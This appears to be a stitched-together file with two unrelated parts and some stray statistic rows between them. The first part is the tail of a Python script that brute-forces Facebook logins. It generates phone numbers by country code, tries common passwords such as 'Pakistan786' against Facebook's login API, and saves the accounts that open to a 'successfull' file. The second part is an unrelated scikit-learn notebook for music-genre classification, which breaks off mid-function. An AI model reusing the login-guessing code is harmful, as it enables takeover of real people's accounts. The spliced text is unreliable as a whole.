for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="19":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.151,152,153,155,157,159,160,162,179,163,174,163")
try:
c = raw_input("\033[1;95m choose code : ")
k="+49"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="20":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.11,12,13,14,15,16,17,18,19")
try:
c = raw_input("\033[1;95m choose code : ")
k="+60"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="21":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.71,72,73,74,75,76,77,78")
try:
c = raw_input("\033[1;95m choose code : ")
k="+94"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="22":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.55,54,53,52,50")
try:
c = raw_input("\033[1;95m choose code : ")
k="+90"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="23":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first tree digits and the last seven digits of any phone number in this country.Write the remaining digits here.50,55,58,54,56")
try:
c = raw_input("\033[1;95m choose code : ")
k="+971"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="24":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first three digits and the last seven digits of any phone number in this country.Write the remaining digits here.50,51,52,53,54,55,56,57,58,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+966"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="25":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first three digits and the last seven digits of any phone number in this country.Write the remaining digits here. 52,55")
try:
c = raw_input("\033[1;95m choose code : ")
k="+972"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="26":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.990,915,901,933,938,902")
try:
c = raw_input("\033[1;95m choose code : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =='0':
login()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
jalan ('[✓] Total Numbers: '+xxx)
time.sleep(0.05)
jalan(' \033[1;93mPlz Wait Cloned Accounts Will Appear Here')
time.sleep(0.05)
jalan ('[!] To Stop Process Press CTRL Then Press z')
time.sleep(0.05)
print 44*'-'
print (logo2)
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass2+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass2+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass3+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass3+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="Pakistan786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m{Hacked 100%💉} ' + k + c + user + ' 》 ' + pass4+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'-•◈•-'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;96m[24Hours] ' + k + c + user + ' 》 ' + pass4+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'-•◈•-'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 44*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
print """
"""
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| 37.155102
| 321
| 0.496942
| 4,826
| 27,309
| 3.359511
| 0.117281
| 0.171837
| 0.255721
| 0.338247
| 0.812434
| 0.792142
| 0.787084
| 0.768827
| 0.74872
| 0.738481
| 0
| 0.098289
| 0.199385
| 27,309
| 734
| 322
| 37.205722
| 0.498811
| 0.003882
| 0
| 0.678779
| 0
| 0.075581
| 0.497312
| 0.245361
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.056686
| 0.013081
| null | null | 0.213663
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
b18983696440cf0120a7df9de91697a34d62003d
| 114
|
py
|
Python
|
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
map/__init__.py
|
idlebear/carla-fun
|
e95e25ba99c46eb1545ed539d33f0c2b20829e56
|
[
"MIT"
] | null | null | null |
from .global_route_planner import GlobalRoutePlanner
from .global_route_planner_dao import GlobalRoutePlannerDAO
| 28.5
| 59
| 0.903509
| 13
| 114
| 7.538462
| 0.615385
| 0.204082
| 0.306122
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 114
| 3
| 60
| 38
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
49367bf18223f0c56943ae794539f760c102eabe
| 46,832
|
py
|
Python
|
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
3_models.py
|
shivanirmishra/musicgenre
|
954214b6f7756c05de1253702811fd69dd99b0e2
|
[
"MIT"
] | null | null | null |
from google.colab import drive
drive.mount('/content/drive')
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/4classdata.csv')
"""##**Applying different models to data**"""
from matplotlib import pyplot as plt
def correlation_matrix(data, filename='output'):
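# Plot the pairwise feature-correlation matrix as a heat map, labelling the ticks with the dataframe columns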
f = plt.figure(figsize=(19, 15))
plt.matshow(data.corr(), fignum=f.number)
plt.xticks(range(data.shape[1]), data.columns, fontsize=10, rotation=90)
plt.yticks(range(data.shape[1]), data.columns, fontsize=10)
cb = plt.colorbar()
cb.ax.tick_params(labelsize=12)
plt.show()
correlation_matrix(data)
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("Perplexity 30")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne3D(): # this function is used to apply tsne on dataset_1 to reduce it to three dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("Perplexity 30")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne3D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
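# max_iter is raised well above sklearn's default of 100 so lbfgs converges on this multiclass problem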
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
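# Stratified 5-fold cross-validation: each fold keeps the overall class distribution; returns the mean accuracy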
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'sigmoid', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=4000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
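# Hard-voting ensemble: every base classifier casts one vote per sample and the majority label wins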
models = list()
models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
models.append(('svm', SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')))
models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
ensemble = VotingClassifier(estimators=models, voting='hard')
return ensemble
ensemble = voting()
ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
yp = ensemble.predict(x_test)
print(accuracy_score(y_test,yp))
yp = ensemble.predict(x_train)
print(accuracy_score(y_train,yp))
data.shape
"""#**5 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.transform(x_test)  # reuse the scaler fitted on the training data instead of refitting on the test set
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 5-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne3D(): # this function is used to apply tsne on dataset_1 to reduce it to three dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 5-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
plt.zlabel("Dimension 3")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne3D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
    # 5-fold stratified cross-validation accuracy of the classifier passed in
    cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
    scores = cross_val_score(clf, X, y, cv=cv, scoring='accuracy')
    return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
    models = list()
